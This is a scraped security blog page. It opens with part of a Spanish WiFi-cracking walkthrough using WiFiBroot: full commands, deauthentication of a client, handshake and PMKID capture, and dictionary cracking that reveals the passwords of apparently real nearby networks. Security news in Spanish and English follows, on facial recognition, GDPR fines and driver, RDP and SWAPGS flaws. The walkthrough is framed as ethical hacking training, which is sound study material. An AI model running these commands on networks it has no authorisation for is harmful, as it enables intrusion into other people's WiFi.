   3  MTNL_HOTSPOT    -78  WPA2   TKIP      PSK       11  0C:D2:B5:2C:55:5D  Binatone     1
   4  Neon`Sunny      -87  WPA2   TKIP      PSK        1  34:E3:80:41:F8:68  Genexis      0
   5  TP-LINK_D9D6    -87  WPA2   CCMP      PSK        1  98:DE:D0:A7:D9:D6  TP-LINK      0

  • Presione Ctrl + C para detener el escaneo. Aquí nuestro objetivo es MTNL_HOTSPOT
  • Ingrese 3 para descifrar MTNL_HOTSPOT
 [] Changing Channel to 11 [SuccessFul] 
  • Ingrese n
[?] AP Clients [1] Scan Further?[Y/n] n
[] Time Interval [15] -> Implies Gap b/w Frames is 15
  • Luego se envía la de-autenticación a los clientes conectados. A continuación se muestra un dispositivo conectado con el punto de acceso
[^] 32-> 8CBEBE314C0F (Xiaomi) >< 0CD2B52C555D (Binatone) [Deauthentication] 
[^] 32-> 8CBEBE314C0F (Xiaomi) >< 0CD2B52C555D (Binatone) [Deauthentication] 
[^] 32-> 8CBEBE314C0F (Xiaomi) >< 0CD2B52C555D (Binatone) [Deauthentication]
  • Como el usuario ingresará la contraseña en su propio dispositivo, Wifibroot capturará el handshake y la contraseña
[+] Handshake 0CD2B52C555D (Binatone) [Captured]
[!] Handshake not saved. Use -w, --write for saving handshakes.
[^] Current Password: 29054367
[+] Found: 29054367
 [>] PMK:
 00000000:  74 0a ac 04 01 16 0c dd  73 fb 4e fa 50 17 18 7f  |t…….s.N.P…|
 00000010:  a1 c0 92 36 45 20 94 15  79 42 17 bb e2 21 5d 42  |…6E…yB…!]B|
 [>] PTK:
 00000000:  95 5f ee 82 ca c3 a2 b5  b1 a1 75 4a 11 a2 d8 05  |._……..uJ….|
 00000010:  49 08 62 ec 2b b9 e6 12  13 bd f8 53 7a 0d ce a0  |I.b.+……Sz…|
 00000020:  5c 4f d1 ca 04 32 4c bb  f4 6a 27 21 83 26 b3 ad  |\O…2L..j'!.&..|
 00000030:  84 42 fb e4 49 b7 e4 e2  65 03 58 d2 30 f2 35 cb  |.B..I…e.X.0.5.|
 [>] MIC:
 00000000:  da 86 9b 74 b7 d5 aa 67  2a 7d 78 aa 30 0e df e4  |…t…g*}x.0…|
 00000010:  29 9a d2 de
  • Arriba se muestra que la contraseña actual es 29054367
  • Todos estos escenarios son parte de los cursos de hacking ético ofrecidos por el Instituto Internacional de Seguridad Cibernética

Capturar y descifrar PMKID

  • Escriba python wifibroot.py –mode 2 -i wlan0mon –verbose -d dicts/list.txt -w output.txt
  • –mode 2 se utiliza captura y crack PMKID
  • -i wlan0mon es el adaptador wifi utilizado para descifrar redes WiFi. Para el craqueo estamos usando TP-Link TL – WN722N V1
  • –verbose se usa para imprimir valores hash
  • -d se usa para la ruta del diccionario. Para las pruebas estamos utilizando el diccionario incorporado Wifibroot. Puede usar cualquier lista de palabras
  • -w output.txt guardará el PMKID
root@kali:/home/iicybersecurity/Downloads/WiFiBroot# python wifibroot.py --mode 2 -i wlan0mon --verbose -d dicts/list.txt -w output.txt
 _        ___  ___ ___  ___   ___
 \\  _ /\*\___*\__\\__\/   \ /   \\___
  \  \\  \\\   \\__\\ /\  ) \\  ) \\  \
   \__\\__\\\   \\__\\ \\__ / \___/ \__\

          v1.0. Coded by @hash3liZer.

[*] Path: {dicts/list.txt} Lines {42}
[~] Channel Specified: NONE Hopper Status [Running]
[^] Scanning! Press [CTRL+C] to stop.
  • Presione Ctrl + C para detener el escaneo. Aquí nuestro objetivo es new_T03_T1
NO  ESSID                               PWR  ENC       CIPHER    AUTH      CH  BSSID              VENDOR      CL
 ----  --------------------------------  -----  --------  --------  ------  ----  -----------------  --------  ----
    1  Pankaj@9212458712                   -23  WPA2      CCMP      PSK        6  18:A6:F7:9B:27:DC  TP-LINK      0
    2  Cbi                                 -29  WPA2      CCMP      PSK        2  00:E0:4C:3B:37:08  REALTEK      0
    3  naidus                              -45  WPA       CCMP      PSK        2  C8:3A:35:0B:26:08  Tenda        0
    4  Lucky                               -47  WPA2      TKIP      PSK        1  54:B8:0A:07:82:D2  D-Link       0
    5  new_T03_T1                          -50  WPA2      TKIP      PSK       11  90:8D:78:F2:95:E3  D-Link       3
    6  DIRECT-28-HP DeskJet 2600 series    -59  WPA2      CCMP      PSK        6  B4:B6:86:65:DC:29  Hewlett      0
    7  Worldview@37                        -76  WPA2      CCMP      PSK        1  04:95:E6:A2:58:20  Tenda        0
    8  Sushil@WVC9312408388                -84  WPA       CCMP      PSK       11  0C:D2:B5:3D:0D:3C  Binatone     0
    9  Excitel                             -85  WPA2      CCMP      PSK        6  00:1E:A6:DB:B3:C0  Best         0
   10  Bunty                               -86  WPA2      CCMP      PSK        7  04:95:E6:87:AB:48  Tenda        0
   11  Excitel@43                          -86  WPA2/WPA  CCMP      PSK        7  C8:3A:35:46:BA:F8  Tenda        0
   12  Worldview@tanpreet                  -88  WPA2      TKIP      PSK       13  A0:AB:1B:D9:09:08  D-Link       0
  • Ingrese 5 para descifrar new_T03_T1
[^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 2 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 1 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 2 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 1 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 2 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 1 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Open Authentication] [] Authentication 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [SuccessFull]
 [^] 4 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Association Request]
 [^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Association Request]
 [] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] [] Authentication 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [SuccessFull]
[] EAPOL 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [Waiting…] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] EAPOL 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [Initiated]
[^] EAPOL 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [1 of 4]
[~] Vulnerable to PMKID Attack!
[^] PMKID 908D78F295E3 (D-Link) [a31f70cc4ed5cabb67ae4d56f11ec0b6]
[+] PMKID -> [output.txt] [Saved]
[^] Currently Checking: accessme
[+] Password Found: accessme
[>] PMKID:
 00000000:  61 33 31 66 37 30 63 63  34 65 64 35 63 61 62 62  |a31f70cc4ed5cabb|
 00000010:  36 37 61 65 34 64 35 36  66 31 31 65 63 30 62 36  |67ae4d56f11ec0b6|
 [>] PMK:
 00000000:  93 89 96 03 d0 e8 ab bd  e8 8b f1 1b fb 8f 05 18  |…………….|
 00000010:  58 1e e3 cb 6d 2b ff 0d  b4 96 b4 fa 74 57 bd 77  |X…m+……tW.w|
  • Arriba se muestra la contraseña del punto de acceso objetivo

Tuesday 20 August 2019

Monday 19 August 2019

CÓMO HARÁ AMAZON PARA VENDER SUS DATOS DE RECONOCIMIENTO FACIAL USANDO UN TIMBRE

CONTENIDO ORIGINAL: https://noticiasseguridad.com/tecnologia/como-hara-amazon-para-vender-sus-datos-de-reconocimiento-facial-usando-un-timbre/

En una nueva solicitud de patente disponible para todo público, el gigante tecnológico Amazon ha presentado un proyecto que combina el uso de tecnología de reconocimiento facial (como Rekognition, el sistema de reconocimiento desarrollado por la compañía) y Ring, el interfon con cámara que Amazon acaba de adquirir. Acorde a especialistas en ciberseguridad, esta se convertiría en una poderosa herramienta de monitoreo a nivel doméstico, lo que puede generar serias consecuencias de privacidad.

La idea es consolidar un modelo de interfon impulsado por Rekognition, esto permitiría a los usuarios recolectar en tiempo real amplios detalles sobre las personas que merodean la entrada de su hogar. “La intención es ayudar a los usuarios a tomar decisiones informadas sobre la seguridad de su hogar, permitiendo integrar una base de datos con los rostros de personas potencialmente peligrosas”, menciona la solicitud de patente.

No obstante, especialistas de la Unión Americana para las Libertades Civiles (ACLU) consideran que la implementación de este proyecto abriría una brecha de seguridad enorme en cada casa americana. “El plan de Amazon es increíblemente peligroso, pues sugiere la creación de un centro de vigilancia masiva, fuera del control de cualquier entidad del gobierno, implementando sistemas de reconocimiento facial en cada hogar”, menciona Jacob Snow, abogado especializado en tecnología, libertades civiles y ciberseguridad.

Piense en el siguiente escenario: un grupo de voluntarios se pasea por un vecindario con el propósito de registrar a los votantes de una elección. Si el plan de Amazon se implementara en dicho vecindario y el sistema encontrara alguna coincidencia entre estos individuos y una base de datos de sospechosos o sujetos de investigación criminal, las autoridades podrían ser notificadas, o al menos podrían integrar la imagen de los sospechosos a una base de datos del gobierno.

El uso masivo de tecnología de reconocimiento facial, su eficiencia e impacto en la privacidad de las personas ha sido objeto de discusión por años. Además, existen algunas características que deben ser tomadas en cuenta, como el hecho que esta tecnología sea menos eficiente en personas de color y mujeres, pues en estos casos tiende a encontrar falsas coincidencias. Otro aspecto preocupante, afirman los expertos en ciberseguridad, es la ausencia de control legislativo en cuanto al uso de esta tecnología.

Expertos del Instituto Internacional de Seguridad Cibernética (IICS) afirman que este no es el único proyecto de reconocimiento facial impulsado por Amazon. La firma recientemente adquirió dos patentes para el desarrollo de una pulsera capaz de monitorear los movimientos del usuario en tiempo real, posiblemente para implementarlo en sus plantas y limitar al máximo los periodos de inactividad de sus empleados; “están tratando de convertirnos en máquinas, en simples datos almacenados en una computadora”, considera un empleado que ha solicitado permanecer anónimo.


HOW AMAZON IS SELLING YOUR FACIAL RECOGNITION DATA USING A DOORBELL

ORIGINAL CONTENT: https://www.securitynewspaper.com/2019/08/14/how-amazon-is-selling-your-facial-recognition-data-using-a-doorbell/

In a new patent application available to the public, technology giant Amazon has presented a project that combines the use of facial recognition technology (such as Rekognition, the face detection system developed by the company) and Ring, the camera-based doorbell that Amazon just acquired. According to cybersecurity specialists, this would become a powerful home-level monitoring tool, which can have serious privacy consequences.

The idea is to consolidate a doorbell model powered by Rekognition, this would allow users to collect in real time extensive details about the people who prowl the entrance of their home. “The intention is to help users make informed decisions about the safety of their home, allowing a database to be integrated with the faces of potentially dangerous people,” the patent application mentions.

However, specialists from the American Civil Liberties Union (ACLU) believe that the implementation of this project would open up a huge security breach in every American home. “Amazon’s plan is incredibly dangerous, suggesting the creation of a mass surveillance center, beyond the control of any government entity, implementing facial recognition systems in every home,” says Jacob Snow; lawyer specialized in technology, civil liberties and cybersecurity.

Consider the following scenario: A group of volunteers walks through a neighborhood for the purpose of registering voters in an election. If Amazon’s plan were implemented in that neighborhood and the system finds some match between these individuals and a database of suspects or subjects of criminal investigation, the authorities could be notified, or at least image of the suspects to a government database.

The massive use of facial recognition technology, its efficiency and impact on people’s privacy has been the subject of discussion for years. In addition, there are some features that need to be taken into account, such as the fact that this technology is less efficient in people of color and women, as in these cases tends to find false matches. Another worrying aspect, cybersecurity experts say, is the lack of legislative control over the use of this technology.

Experts from the International Institute of Cyber Security (IICS) say this is not the only facial recognition project powered by Amazon. The firm recently acquired two patents for the development of a wristband capable of monitoring user movements in real time, possibly to implement it in its plants and limit the downtime of its employees to the maximum; “They’re trying to turn us into machines, into simple data stored on a computer,” he considers an employee who has requested to remain anonymous.


Friday 16 August 2019

PWC OFFERED CYBERSECURITY SERVICES AND ENDED UP BEING FINED $170K USD FOR DATA PRIVACY ISSUES

ORIGINAL CONTENT: https://www.securitynewspaper.com/2019/08/13/pwc-offered-cybersecurity-services-and-ended-up-being-fined-170k-usd-for-data-privacy-issues/

The data protection regulator in Greece has reported that the leading consultancy PriceWaterhouseCoopers (PwC) will be fined $170k USD for violations of Article 83 of the European Union’s General Data Protection Regulation (GDPR), data protection specialists report. Data protection authorities in Greece also imposed some corrective measures that must be implemented by the company to comply with European data law.

European community data legislation lays down the regulatory bases to which any organization that operates on personal data must submit to control this information. While the consent of the data subjects is one of these bases, it is not the only one, so the way to control PwC’s personal data was inappropriate, according to the opinion of the Greek data protection authority.

The company processed this information in the course of its business activities without employees being informed about it. The authorities determined that this way of working with personal information violates the principles of fairness and transparency set out in the GDPR.

The company also has accountability issues, as it failed to demonstrate adequate compliance with the GDPR and transferred the burden to data subjects, an inappropriate procedure as set out in the regulations, mentioned by data protection specialists. Therefore, the Greek company was fined and now has a three-month deadline to comply with the taxes established by the authorities.

This is the first time that one of the 4 greatest consultants in the world receives a fine for non-compliance with the GDPR. The irony of this issue is that PcW is one of the companies that had the most work a couple of years ago advising multiple companies to comply with European data legislation. “It’s really amazing that this company is generating so many revenue from GDPR-related services and now it turns out that it has violated an article of this legislation,” data protection experts said.

This is a sign that any company that controls personal data could default to GDPR, regardless of whether they are small companies or large companies. Another well-known case is that of Google, although in this case the fine was much higher, reaching 5 billion dollars. In the case of PwC, the data regulator in Greece stated that “this amount has been established as an effective, proportionate and deterrent method”, in other words, the strictly provisions of European data regulation have not been used.

However, this does not mean that this decision is an irrelevant fact; according to data protection specialists from the International Institute of Cyber Security (IICS), this fine could trigger a number of similar measures, as many companies have contracted PwC’s advice to comply with the European data; a bad computer security practice at PwC could replicate in many other companies, increasing this problem of non-compliance.

To the company’s fortune, its reputation in the field of data security has not suffered irreversible damage; PwC executives can still demonstrate to data regulators that they are able to implement the measures recommended by the Greek government, so more than a big fiasco, this is a great opportunity to learn.


Thursday 15 August 2019

LOS CONTROLADORES DE MÁS DE 40 FIRMAS, COMO ASUS, REALTEK, GIGABYTE, INTEL, AMD, TOSHIBA, ENTRE OTROS, SON VULNERABLES A LOS HACKERS

CONTENIDO ORIGINAL: https://noticiasseguridad.com/vulnerabilidades/los-controladores-de-mas-de-40-firmas-como-asus-realtek-gigabyte-intel-amd-toshiba-entre-otros-son-vulnerables-a-los-hackers/

Un equipo de especialistas en hacking ético de la firma Eclypsium ha revelado un informe que describe una vulnerabilidad crítica presente en el diseño del software usado en los controladores (drivers) modernos que, de ser explotada, permitiría a los actores de amenazas obtener elevados privilegios que les garantizaría acceso sin restricción alguna al hardware.

Los reportes afirman que más de 40 fabricantes de hardware podrían ser afectados por la vulnerabilidad, incluyendo a grandes nombres en la industria como Asus, Realtek, Gigabyte, AMD, Intel y Toshiba.

Acorde a los expertos en hacking ético, la vulnerabilidad, presente en todas las versiones modernas de Windows, es una muestra clara de un problema fundamental en el proceso de certificación de los controladores de Microsoft, pues todos los componentes potencialmente comprometidos fueron certificados por este gigante tecnológico.

“Un driver vulnerable podría permitir a cualquier actor de amenazas realizar una escalada de privilegios en el dispositivo comprometido, por lo que notificamos a Microsoft esperando que los parches correspondientes sean lanzados lo antes posible”, mencionaron los expertos a cargo de la investigación. Esta firma se especializa en el software para la protección contra los ataques basados en firmware.

Después de que la lista de fabricantes vulnerables fuera revelada, un portavoz de Intel mencionó que la compañía ya ha emitido una alerta de seguridad a través de Intel Processor Diagnostic Tool, recomendando a los usuarios actualizar sus sistemas a las versiones más recientes. Al parecer no todas las compañías estaban al tanto de esta situación, como parece ser el caso de AMD, que no emitió un sólo comentario al respecto sino hasta hace unas cuantas horas, a través de su blog.

Los expertos en hacking ético mencionaron que estos hallazgos podrían dificultar las labores de seguridad de firmware en el futuro, pues no existe un mecanismo universal para prevenir estos riesgos de seguridad en todos los controladores disponibles en el mercado. “Esto podría crear una ventana de oportunidad para los hackers, pues les brinda la capacidad de corromper cualquier componente o recopilar información por largos periodos de tiempo sin ser detectados”, agregan los expertos.


40 OEM DRIVERS LIKE ASUS, REALTEK, GIGABYTE, INTEL, AMD AND TOSHIBA ARE VULNERABLE TO HACKERS

ORIGINAL CONTENT: https://www.securitynewspaper.com/2019/08/12/40-oem-drivers-like-asus-realtek-gigabyte-intel-amd-and-toshiba-are-vulnerable-to-hackers/

A team of ethical hacking specialists from Eclypsium security firm has revealed a report describing a critical vulnerability present in the design of software used in modern drivers that, if exploited, would allow threat actors to get high privileges that would guarantee them unrestricted access to hardware.

Reports claim that more than 40 hardware manufacturers could be affected by the vulnerability, including big names in the industry like Asus, Realtek, Gigabyte, AMD, Intel and Toshiba.

According to ethical hacking experts, the vulnerability, present in all modern versions of Windows, is a clear example of a fundamental problem in the certification process of Microsoft drivers, as all components potentially compromised were certified by this tech giant.

“A vulnerable driver could allow any threat actor to escalating privileges on the compromised device, so we notify Microsoft expecting the corresponding patches to be released as soon as possible,” the experts in charge of the investigation said. This firm specializes in software for protection against firmware-based attacks.

After the list of vulnerable manufacturers was publicly disclosed, an Intel spokesperson mentioned that the company has already issued a security alert through the Intel Processor Diagnostic Tool, recommending users upgrade their systems to the most recent version. Apparently not all companies were aware of this situation, as seems to be the case with AMD, which did not comment on it until a few hours ago, through its blog.

Ethical hacking experts mentioned that these findings could hinder firmware security efforts in the future, as there is no universal mechanism to prevent these security risks on all drivers available on the market. “This could create a window of opportunity for hackers, as it gives them the ability to corrupt any component or collect information for long periods of time without being detected,” the experts added.

As a precautionary measure, ethical hacking experts from the International Institute of Cyber Security (IICS) recommend performing periodic firmware scans and upgrading each time manufacturers release new patches and software versions. Firmware integrity monitoring is also vital, as it helps detect unauthorized changes or anomalies before problems grow to such point.


Wednesday 14 August 2019

Tuesday 13 August 2019

RAZONES SIMPLES POR LAS QUE LA NUBE DE MICROSOFT AZURE NO ES SEGURA

CONTENIDO ORIGINAL: https://noticiasseguridad.com/seguridad-informatica/razones-simples-por-las-que-la-nube-de-microsoft-azure-no-es-segura/

Una reciente investigación realizada por especialistas en hacking ético de la firma Check Point Research reveló la existencia de decenas de vulnerabilidades en un protocolo de uso común en Microsoft Azure. Estas fallas exponen a múltiples ataques cibernéticos a los usuarios de la nube de Microsoft.

Durante su presentación en la conferencia de ciberseguridad Black Hat, los expertos señalaron que las fallas en el Protocolo de Escritorio Remoto (RDP), empleado para acceder a otras máquinas con sistema Windows a distancia, podrían ser explotadas para ejecutar código arbitrario en el sistema objetivo. Al hacer esto, los actores de amenazas podrían ver, modificar e incluso eliminar datos o crear nuevas cuentas con altos privilegios.

A principios de año, la firma reveló la existencia de 25 vulnerabilidades en el protocolo RDP que podrían haber sido explotadas para comprometer una máquina. Las fallas reportadas afectaron a diversos clientes de código abierto de RDP como FreeRDP, rdesktop (incluido en distribuciones de Kali Linux) y al cliente Windows mstc.exe.

“Una vez que se establece un canal directo de regreso a la máquina objetivo, los hackers podrían hacer prácticamente cualquier cosa en el sistema de la víctima”, menciona uno de los expertos en hacking ético responsables de la investigación.

Acorde a los expertos en hacking ético, estas fallas también abren la puerta para el despliegue de ataques con mayor alcance contra los clientes de la plataforma en la nube de Azure. Según los más recientes hallazgos, Hyper-V, de Microsoft, usado para la administración de máquinas virtuales en ubicaciones remotas, también es vulnerable a estas fallas. “Cualquier usuario conectado a la nube con una máquina Windows, o usando las máquinas virtuales Hyper-V, está expuesto a la explotación de estas vulnerabilidades”, reportan los expertos.

Los expertos reportan que, al abusar de la función “copiar y pegar” durante una conexión RDP, un servidor malicioso podría colocar arbitrariamente archivos en ubicaciones predeterminadas en la computadora del cliente, situación que expone a la víctima a toda clase de actividades maliciosas.

“Los sistemas informáticos son tan fuertes como su eslabón más débil, al depender de otras bibliotecas de software estas implementaciones heredan todas las vulnerabilidades en los protocolos de amplio uso, como RDP”, mencionaron los expertos.

Acorde a especialistas en hacking ético del Instituto Internacional de Seguridad Cibernética (IICS) aproximadamente el 57% de las compañías más importantes de E.U. usan Microsoft Azure, además, como si no fuera suficiente, se calcula que alrededor del 45.8% de todas las computadoras del mundo usan Windows 10, por lo que el alcance de esta vulnerabilidad es enorme.

Por su parte, la compañía lanzó una actualización de seguridad en julio pasado, invitando a los clientes a instalar las correcciones o, en su defecto, verificar que las actualizaciones automáticas estén habilitadas para garantizar su protección. “Tratamos de crear conciencia entre nuestros clientes para mitigar el riesgo de explotación de estas fallas”.


SIMPLE REASONS WHY THE MICROSOFT AZURE CLOUD ISN’T SECURE

ORIGINAL CONTENT: https://www.securitynewspaper.com/2019/08/08/simple-reasons-why-the-microsoft-azure-cloud-isnt-secure/

Recent research by ethical hacking specialists from Check Point Research revealed the existence of dozens of vulnerabilities in a commonly used protocol in Microsoft Azure. These flaws expose multiple cyberattacks to Microsoft cloud users.

During their presentation at the Black Hat cybersecurity conference, experts noted that Remote Desktop Protocol (RDP) flaws, used to access other Windows remote machines, could be exploited to execute code arbitrary in the target system. By doing this, threat actors could view, modify, and even delete data or create new, high-privileged accounts.

Earlier this year, the firm revealed the existence of 25 vulnerabilities in the RDP protocol that could have been exploited to compromise a machine. Reported flaws affected various open source RDP clients such as FreeRDP, rdesktop (included in Kali Linux distributions) and Windows mstc.exe client.

“Once a direct channel is established back to the target machine, hackers could do virtually anything on the victim’s system,” says one of the ethical hacking experts responsible for the investigation.

According to ethical hacking experts, these vulnerabilities also open the door to deploying more far-reaching attacks against customers on the Azure cloud platform. According to the latest findings, Microsoft’s Hyper-V, used for managing virtual machines in remote locations, is also vulnerable to these flaws. “Any user connected to the cloud with a Windows machine, or using Hyper-V virtual machines, is exposed to exploiting these vulnerabilities,” the experts report.

Experts report that by abusing the “copy and paste” function during an RDP connection, a malicious server could arbitrarily place files in default locations on the client’s computer, a situation that exposes the victim to all kinds of malicious activities.

“Computer systems are as strong as their weakest link, by relying on other software libraries these implementations inherit all vulnerabilities in widely-used protocols, such as RDP,” the experts said.

According to ethical hacking specialists from the International Institute of Cyber Security (IICS) approximately 57% of the largest U.S. companies use Microsoft Azure, and as if that were not enough, it is estimated that about 45.8% of all computers around the world use Windows 10, so the scope of this vulnerability is huge.

On the other hand, the company released a security update last July, inviting customers to install the fixes or, failing that, verify that automatic updates are enabled to ensure their protection. “We try to raise awareness among our customers to mitigate the risk of exploitation of these bugs.”


CRITICAL SQL INJECTION VULNERABILITY IN A STARBUCKS ENTERPRISE DATABASE

ORIGINAL CONTENT: https://www.securitynewspaper.com/2019/08/08/critical-sql-injection-vulnerability-in-a-starbucks-enterprise-database/

website security specialist dedicated to the bug reporting helped fix a critical SQL injectionflaw affecting an enterprise database in the famous coffee chain Starbucks. The flaw could have exposed confidential financial and accounting data.

Thanks to his discovery, expert Eugene Lim (also known as ‘spaceraccoon’) received a $4,000 bounty, paid through Starbucks’ vulnerability bounty program, operated by the HackerOneplatform.

The compromised database stored confidential company records, such as Starbucks tax data, invoices, and payroll information; in turn, the vulnerability allowed any threat actor with the necessary knowledge to access these logs without authorization.

The vulnerability was discovered by the website security expert resides in an HTML file upload form, which created a way to access the database. Specifically, Lim discovered that the flaw was exploitable using XML-formatted HTTP payload requests with a simple quote encoded for the server running Microsoft Dynamics AX, a financial and accounting software platform. After receiving the report in mid-April, Starbucks began the process of correcting the bug; two days later, the vulnerability was completely patched.

According to website security experts, Lim’s first attempts to deploy an XXE (XML External Entity) attack on the file upload form within the company’s web infrastructure were unsuccessful. Weeks later, the expert returned to the same endpoint and managed to condone a SQL injection attack by realizing that a simple XML-encoded quotation mark caused the database to fail. “Even though SQL injection is a variant of attack known for years, it remains a really common vulnerability in various corporate systems,” he says. “Maybe they are found infrequently, but the SQL injections are definitely not extinct, I myself found a couple of them a few days ago,” he added.

Website security experts from the International Institute of Cyber Security (IICS) say that many developers resort to the use of a wrapper function, such as Object Relational Mapping, to reduce the risk of SQL injection. However, in some cases queries are applied without a wrapper or with poor configuration of this function.

In addition, experts warn of the severe consequences that a SQL injection can cause. “The problem is that SQL injections often generate critical consequences that can even lead to much higher risk scenarios, such as remote code execution,” the experts mention.

The $4,000 reward the expert received for his report may seem small compared to the figures handled in other vulnerability reward programs, but it’s worth noting that this is the largest amount set by the Starbucks bug bounty program.

Still, Lim is said to be satisfied by his work. “Looking for rewards from larger companies may bring greater benefits, but money isn’t my only motivation. Companies like Starbucks respond immediately to these reports and allow for greater interaction; in this case, the process of reporting and correcting the vulnerability took less than a week and working with them was a good experience,” he said.


Monday 12 August 2019

The great Hack Netflix Movie


NUEVA VULNERABILIDAD SWAPGS EN WINDOWS AFECTA CPUS DE INTEL Y AMD

CONTENIDO ORIGINAL: https://noticiasseguridad.com/vulnerabilidades/nueva-vulnerabilidad-swapgs-en-windows-afecta-cpus-de-intel-y-amd/

Especialistas en análisis de vulnerabilidades han revelado la existencia de una vulnerabilidad de seguridad que afecta a todos los equipos de cómputo con sistema operativo Windows que se ejecutan en procesadores Intel y AMD de 64 bits. De ser explotadas, estas fallas podrían brindarle a un hacker acceso a las contraseñas, conversaciones privadas y otra información confidencial almacenada en la memoria del núcleo del sistema operativo.

Acorde a los reportes, la vulnerabilidad se aprovecha de la instrucción SWAPGS, una función que hace el cambio entre la memoria del usuario y la memoria del kernel. Los expertos mencionan que, debido a que la vulnerabilidad reside en esta función, prácticamente todos los CPU Intel fabricados desde 2012 hasta ahora están expuestos a esta falla. Informes posteriores afirman que, además de los CPU Intel, los sistemas x86-64 que usan procesadores Intel o AMD también están expuestos.

Grupos de expertos y firmas de análisis de vulnerabilidades han colaborado con Intel por más de un año para corregir esta falla y otras “vulnerabilidades de canal lateral”. Según expertos de Bitdefender, esta falla es capaz de esquivar cualquier mitigación implementada desde enero de 2018, cuando se descubrieron las vulnerabilidades Spectre y Meltdown, hasta la actualidad.

A pesar de que algunos miembros de la comunidad de la ciberseguridad ya conocían esta información, se decidió esperar a que Microsoft desarrollara una solución para esta falla, misma que sería lanzada como parte de su paquete de actualizaciones periódicas. A pesar de que las compañías se apresuraron a lanzar parches, los expertos consideran que aún es posible que los atacantes que conozcan el método de explotación puedan robar información confidencial.

Por su parte, Microsoft declaró: “Estamos al tanto de estas fallas, ahora estamos trabajando con los fabricantes de chips y otros socios en la industria para desarrollar las correcciones pertinentes para proteger la información de los usuarios. Las actualizaciones fueron lanzadas en julio, los usuarios que cuentan con Microsoft Upadte están protegidos de forma automática”.

En cuanto a la protección de máquinas con sistema Linux, los expertos en análisis de vulnerabilidades del Instituto Internacional de Seguridad Cibernética (IICS) mencionan que se requieren actualizaciones del kernel de Linux, además de algunas actualizaciones de microcódigo, para corregir la falla.


NEW SWAPGS VULNERABILITY ON WINDOWS AFFECTS INTEL AND AMD CPUS

ORIGINAL CONTENT: https://www.securitynewspaper.com/2019/08/07/new-swapgs-vulnerability-on-windows-affects-intel-and-amd-cpus/

Vulnerability testing specialists have revealed a security vulnerability that affects all Windowsoperating system computers running on Intel and AMD 64-bit processors. If exploited, these flaws could give a hacker access to passwords, private conversations, and other sensitive information stored in the operating system kernel memory.

According to reports, the vulnerability takes advantage of the SWAPGS instruction, a function that makes the switch between user memory and kernel memory. Experts mention that because the vulnerability resides in this feature, virtually all Intel CPUs manufactured between 2012 until now are exposed to this flaw. Later reports states that, in addition to Intel CPUs, x86-64 systems using Intel or AMD processors are also exposed.

Expert groups and vulnerability testing firms have collaborated with Intel for over a year to fix this flaw and other “side channel vulnerabilities”. According to Bitdefender experts, this flaw is capable of bypassing any mitigation implemented since January 2018, when the Spectre and Meltdown vulnerabilities were discovered, to the present day.

Although some members of the cybersecurity community already knew this information, it was decided to wait for Microsoft to develop a solution for this flaw, which would be released as part of its periodic update package. Although companies rushed to release patches, experts believe it is still possible for attackers who know the exploit method to steal sensitive information.

On the other hand, Microsoft stated, “We are aware of these flaws, we are now working with chip makers and other partners in the industry to develop the relevant fixes to protect user information. Updates were released in July and users with Microsoft Upadte enabled are automatically protected.”

Regarding the protection of Linux-based machines, vulnerability testing experts at the International Institute of Cyber Security (IICS) mention that Linux kernel updates are required, as well as some updates to the Linux kernel microcode, to correct the flaw.


Friday 9 August 2019

Thursday 8 August 2019

Wednesday 7 August 2019

Tuesday 6 August 2019

Monday 5 August 2019

Best Android apps to hack WIFI networks


Sunday 4 August 2019

Friday 2 August 2019

HACKERS ATACAN A POLICÍA DE LOS ÁNGELES; MILES DE OFICIALES SON CHANTAJEADOS USANDO SUS DATOS PERSONALES

CONTENIDO ORIGINAL: https://noticiasseguridad.com/hacking-incidentes/hackers-atacan-a-policia-de-los-angeles-miles-de-oficiales-son-chantajeados-usando-sus-datos-personales/

Los incidentes de ciberseguridad no han dejado de presentarse en diversos departamentos públicos en múltiples áreas de Estados Unidos. Esta ocasión, especialistas en análisis de vulnerabilidades reportan una brecha de datos en los sistemas del Departamento de Policía de Los Ángeles (LAPD). El incidente habría comprometido algunos detalles personales, como nombres completos, teléfonos, direcciones email y contraseñas almacenadas por la agencia.

Acorde a los reportes, la información personal de alrededor de 2 mil 500 oficiales activos y cerca de 17 mil 500 aspirantes a ingresar a la corporación fueron expuestos durante el incidente, detectado hace apenas unos días. Los hackers incluso accedieron a los registros del estatus de las solicitudes de ingreso.

A través de un comunicado, el departamento confirmó la brecha de datos y afirmó que ya ha comenzado a trabajar en la contención y recuperación del incidente. “Hemos notificado directamente a todos los oficiales y aspirantes potencialmente afectados; seguiremos brindando actualizaciones del incidente a medida que estén disponibles”.

